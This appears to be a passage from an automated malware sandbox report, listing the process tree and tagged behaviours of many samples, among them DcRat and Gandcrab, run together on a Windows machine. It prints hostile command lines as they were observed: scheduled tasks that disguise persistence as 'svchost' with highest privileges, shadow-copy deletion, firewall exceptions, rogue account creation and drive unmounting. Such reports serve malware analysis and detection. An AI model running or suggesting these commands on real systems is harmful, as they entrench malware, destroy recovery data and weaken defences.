C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mtvwsdfmmrjehvjsyqrbjwvkxjnukaqusk"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xnipkw"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3888
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hpnzlobhoi"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\osucj"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3864
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zvzmkqbp"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bpmfkjmjnlr"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tuysjlmrzf"4⤵PID:956
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dwdlkdxlnoqtr"4⤵PID:3140
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nrjdkwimbwiyblft"4⤵PID:1608
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\cneagp"4⤵PID:3672
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mhjlhhqtbd"4⤵PID:1856
-
-
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xcoehajvplvel"4⤵PID:3552
-
-
-
C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Program Files (x86)\BTZ.exe"C:\Program Files (x86)\BTZ.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:776
-
-
C:\Program Files (x86)\Cat.exe"C:\Program Files (x86)\Cat.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Program Files (x86)\Client.exe"C:\Program Files (x86)\Client.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\system32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit4⤵PID:3784
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3468
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:3908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1892
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:3696
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2132
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:3176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:1856
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:3960
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2360
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:3272
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:3400
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- DcRat
PID:2976
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:3348
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3264
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:3232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3692
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:2996
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- DcRat
PID:2864
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:2752
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3216
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:2960
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3316
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:924
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:1516
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit4⤵PID:3612
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit4⤵PID:1924
-
-
-
C:\Program Files (x86)\Darkest Dungeon setub.exe"C:\Program Files (x86)\Darkest Dungeon setub.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Users\Admin\AppData\Roaming\svhost.exe"C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svhost.exe" "svhost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:3296
-
-
-
-
C:\Program Files (x86)\evil.exe"C:\Program Files (x86)\evil.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:828 -
C:\Users\Admin\AppData\Local\Temp\evil.exe"C:\Users\Admin\AppData\Local\Temp\evil.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3640
-
-
-
C:\Program Files (x86)\fwclt.exe"C:\Program Files (x86)\fwclt.exe"3⤵
- Executes dropped EXE
PID:3044
-
-
C:\Program Files (x86)\Gandcrab5.0.3.exe"C:\Program Files (x86)\Gandcrab5.0.3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1048 -
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\System32\wermgr.exe"4⤵
- Drops startup file
- Enumerates connected drives
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1548 -
C:\Windows\SysWOW64\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete5⤵PID:3164
-
-
-
-
C:\Program Files (x86)\Happy18.exe"C:\Program Files (x86)\Happy18.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1484
-
-
C:\Program Files (x86)\kosomk.exe"C:\Program Files (x86)\kosomk.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Users\Admin\AppData\Roaming\dicsord.exe"C:\Users\Admin\AppData\Roaming\dicsord.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3516
-
-
-
C:\Program Files (x86)\LightNeuronX0.exe"C:\Program Files (x86)\LightNeuronX0.exe"3⤵
- Executes dropped EXE
PID:1524
-
-
C:\Program Files (x86)\malecus.exe"C:\Program Files (x86)\malecus.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:2332
-
-
C:\Program Files (x86)\see7.exe"C:\Program Files (x86)\see7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2692 -
C:\Program Files (x86)\see7.exe"C:\Program Files (x86)\see7.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
-
C:\Program Files (x86)\TEST.exe"C:\Program Files (x86)\TEST.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4FE4.tmp.bat""4⤵
- Loads dropped DLL
PID:3564 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2788
-
-
C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"5⤵
- Executes dropped EXE
PID:1784
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Program Files (x86)\touhou virus.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:1708 -
C:\Windows\SysWOW64\net.exenet user Shanghai /add4⤵
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Shanghai /add5⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
-
C:\Windows\SysWOW64\net.exenet user Bad Apple /add4⤵
- System Location Discovery: System Language Discovery
PID:3836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Bad Apple /add5⤵
- System Location Discovery: System Language Discovery
PID:3820
-
-
-
C:\Windows\SysWOW64\net.exenet user Marisa4⤵
- System Location Discovery: System Language Discovery
PID:2740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Marisa5⤵
- System Location Discovery: System Language Discovery
PID:1612
-
-
-
C:\Windows\SysWOW64\net.exenet user Reimu /add4⤵
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Reimu /add5⤵
- System Location Discovery: System Language Discovery
PID:2748
-
-
-
C:\Windows\SysWOW64\mountvol.exemountvol X:\ /d4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:3628
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=PTt19B5_V3I4⤵PID:3628
-
-
-
C:\Program Files (x86)\vbc.exe"C:\Program Files (x86)\vbc.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exeC:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exeC:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:572
-
-
-
-
C:\Program Files (x86)\virus.jk.exe"C:\Program Files (x86)\virus.jk.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2984
-
-
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵PID:3672
-
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵PID:3896
-
-
C:\Windows\helppane.exeC:\Windows\helppane.exe -Embedding1⤵PID:2532
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhlp32w" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Libraries\winhlp32.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1740
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b653" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhlp32" /sc ONLOGON /tr "'C:\Users\Public\Libraries\winhlp32.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
PID:1852
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhlp32w" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\winhlp32.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b653" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2920
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\Windows\inf\WMIADAP.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\kosomk.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1660
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\inf\WMIADAP.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:804
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Windows\inf\WMIADAP.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2416
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomk" /sc ONLOGON /tr "'C:\MSOCache\All Users\kosomk.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
PID:2740
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\kosomk.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\services.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 9 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1644
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\services.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1620
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
PID:2648
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 12 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
PID:2032
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\Darkest Dungeon setub.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\services.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1684
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\ja-JP\csrss.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1608
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Darkest Dungeon setub" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\Darkest Dungeon setub.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1048
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\ja-JP\csrss.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2588
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\Darkest Dungeon setub.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1936
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\ja-JP\csrss.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2196
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 12 /tr "'C:\Users\Default\57ccb6f0bd910fed428761828ae93553.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Users\Default\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 12 /tr "'C:\Users\Default\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f2⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 9 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /f2⤵
- DcRat
- Process spawned unexpected child process
PID:2856
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 5 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f2⤵
- DcRat
